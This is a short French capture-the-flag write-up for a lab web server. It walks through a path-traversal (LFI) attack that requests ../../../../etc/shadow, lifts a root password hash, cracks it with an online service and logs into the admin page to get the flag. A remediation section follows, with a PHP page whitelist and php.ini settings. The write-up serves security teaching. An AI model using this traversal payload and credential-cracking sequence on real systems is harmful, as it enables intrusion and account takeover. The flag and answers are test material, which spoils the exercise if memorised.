Attaque de traversée de chemin :

curl http://192.168.10.22/robots.txt
User-agent: *
Disallow: /whatever
Disallow: /.hidden

http://192.168.10.22/whatever/?page=../../../../etc/shadow
Télécharger le fichier htpasswd et l'ouvrir afin de récupérer le hash : root:437394baff5aa33daa618be47b75cb49
Se rendre ensuite sur https://crackstation.net/ pour cracker le hash :
437394baff5aa33daa618be47b75cb49 => qwerty123@ 

Aller sur http://192.168.10.22/admin/
Taper root + qwerty123@ pour se connecter

FLAG => d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff
=====================================================================================================================================
REMEDIATION 

Protection contre les LFI (Local File Inclusion) :
La faille LFI permet à un attaquant de manipuler le paramètre ?page= pour lire des fichiers système comme /etc/passwd.
- Utilisation d'une Whitelist (Liste Blanche) : Au lieu de laisser l'utilisateur appeler n'importe quel fichier, on définit une liste stricte de pages autorisées. Si la demande ne correspond pas exactement à la liste, l'accès est refusé par défaut.

$allowed_pages = ['home', 'survey', 'member', 'feedback', 'media'];
$page = $_GET['page'];

if (in_array($page, $allowed_pages)) {
    include "pages/" . $page . ".php";
} else {
    include "pages/404.php";
}
-  Désactivation des fonctions dangereuses : Dans le fichier php.ini, il est conseillé de passer allow_url_include à Off pour empêcher les inclusions de fichiers distants (RFI).
